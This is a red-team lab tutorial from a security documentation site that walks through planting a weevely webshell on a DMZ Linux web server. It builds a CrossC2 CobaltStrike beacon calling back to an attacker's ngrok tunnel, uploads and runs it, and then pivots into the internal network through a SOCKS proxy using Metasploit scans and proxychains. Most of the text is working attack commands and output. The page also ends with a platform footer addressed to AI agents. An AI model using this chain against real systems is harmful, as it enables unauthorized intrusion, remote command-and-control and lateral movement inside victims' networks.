> For the complete documentation index, see [llms.txt](https://gitbook.seguranca-informatica.pt/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://gitbook.seguranca-informatica.pt/command-and-control-c-and-c/cobaltstrike-101/weevely-webshell-+-ngrok-+-cs-pivot-+-linux.md).

# Pivoting DMZ: weevely + ngrok + CS Pivot COMBO via Linux

In this laboratory, we will understand how to use a simple webshell to deploy a CobaltStrike beacon on a Linux target system mainly available and placed on a DMZ and use it for pivoting through this machine into the internal network. This is a common scenario many times used during my red teaming assessments, for instance, when I find a flaw that permits the uploading of a webshell into the web-server. Let's do it.

## Webshell - weevely

I use weevely many times to deploy my webshell remotely. More information about this tool [**here**](https://gitbook.seguranca-informatica.pt/cheat-sheet-1/stuff/pivoting#pivoting-with-weevely-via-webshell).

```bash
weevely generate <password> <path>
weevely <URL> <password> [cmd]
```

Example how to access the target machine:

```bash
kali:> weevely http://target_system/evil.php my@password

[+] weevely 4.0.1

[+] Target:     target:/tmp
[+] Session:    /home/kali/.weevely/sessions/target/...
[+] Shell:      System shell

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> 
target:/tmp $ 
```

At this moment, we got a remote connection with the target server. It's time to prepare ngrok + CobaltStrike beacon to pivot into the internal network from our localhost connection.

## [ngrok](https://ngrok.com/)

In this step, you can use a trustable machine (e.g., EC2 instance from AWS) or simply ngrok. ngrok is a very useful tool that allows us to expose our localhost server through any NAT or firewall - and masquerading our public IP address - of course :nerd:&#x20;

{% embed url="<https://gitbook.seguranca-informatica.pt/cheat-sheet-1/stuff/pivoting#ngrok>" %}

We can use a configuration file as described on the link above, or simply by using the following command to start a new server on port: 8083:

```bash
./ngrok tcp 8083
```

Now, it's time to create the CobaltStrike stager.

![](/files/-MXTUEx0rH_RPSBe3peS)

## [**CrossC2** ](https://github.com/gloxec/CrossC2)

CrossC2 framework allows us to generate CobaltStrike's cross-platform payloads, e.g., Linux x64 and x86 beacons.

We can create an x64 or x86 payload depending on the target system architecture.&#x20;

**Tip**: use the `uname -a` command to check the target version.

**ngrok\_ip**: The resolved IP address from the ngrok address.\
**ngrok\_port:** The assigned port to the ngrok address.

```bash
./genCrossC2.Linux ngrok_ip ngrok_port .cobaltstrike.beacon_keys null Linux x86 ./cross
./genCrossC2.Linux ngrok_ip ngrok_port .cobaltstrike.beacon_keys null Linux x64 ./cross
```

![](/files/-MXTV6YyQ2GmAFaxMNwH)

The x64 payload was generated, and we can check it using the ***file*** command:

```bash
kali@kali:~/Desktop$ file cross
cross: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
```

Now, it's time to upload it into the target Linux webserver using weevely:

```bash
target:/tmp $ :file_upload /home/kali/Desktop/cross /tmp/cross
True
target:/tmp $
target:/tmp $ chmod +x cross
```

## Create CS Listener

The next step is to create the CS listener. We need to add our internal IP address on:

* **HTTPS HOSTS**
* **HTTPS HOST (STAGER)**

and the local port (8083) where the ngrok connection is mapped - **HTTPS PORT (C2)**.

![](/files/-MXTXOyqkDn3wqTBFMDs)

After that, the payload can be executed on the weevely webshell:

```bash
./cross
```

And yeah, we got it :sunglasses:&#x20;

![](/files/-MXTYRF6g-ba7TC3ZVym)

## Pivoting using CS

In the next phase, we will:

* **Create a socks4**
* **Use Metasploit to pivot internally;** or
* **Take advantage of proxychains tool** (my favorite approach) :space\_invader:&#x20;

By interacting with the new machine, you have the following options:

![Socks commands were highlighted.](/files/-MXT_M-TuzI8-drlLwXl)

We can create the new socket using the CS console, or by clicking on the target machine.

![](/files/-MXT_t5o9hI81TCRPROf)

![](/files/-MXT_xdU4L3Ka-gA6EYB)

Clicking on "**Launch**" button, the socket is created on the local machine (attacker machine). We can confirm it by using the following command:

```bash
netstat -antp | grep "LISTEN"
(...)
tcp6       0      0 :::14833                :::*                    LISTEN
```

### Metasploit for pivoting internally

Accessing the "**Proxy Pivots**" menu, we can get the command to pivot through MSF.

![](/files/-MXTb4qREpCcmECs1YwE)

After getting the command above, we can start msfconsole and paste the command to set up the new tunnel and scan hosts available on the internal network.

```bash
msfconsole
setg Proxies socks4:10.0.2.15:14833
use auxiliary/scanner/smb/smb_version
set RHOSTS=192.168.0.0/24
run
```

### **Take advantage of proxychains tool**&#x20;

To use proxychains, first, we need to configure the new socks by accessing the ***/etc/proxychains.conf*** file.

```bash
sudo vim /etc/proxychains.conf 
socks4 10.0.2.15 14833
```

After that, we can use a lot of tools, such as crackmapexec, nmap, impacket-tools, and so on, by using the following combination:

```bash
proxychains nc 192.168.x.x 445 -v
```

## Bonus

**Creating CobaltStrike random C2 profile**

{% embed url="<https://github.com/threatexpress/random_c2_profile?s=09>" %}

**CobaltStrike C2 malleable profiles**

{% embed url="<https://github.com/xx0hcd/Malleable-C2-Profiles>" %}

## References

{% embed url="<https://blog.cobaltstrike.com/2016/06/01/howto-port-forwards-through-a-socks-proxy/>" %}

{% embed url="<https://wh0ale.github.io/2019/12/11/VulnStack%E5%9F%9F%E7%8E%AF%E5%A2%83%E9%9D%B6%E5%9C%BA%E6%B8%97%E9%80%8F/>" %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://gitbook.seguranca-informatica.pt/command-and-control-c-and-c/cobaltstrike-101/weevely-webshell-+-ngrok-+-cs-pivot-+-linux.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.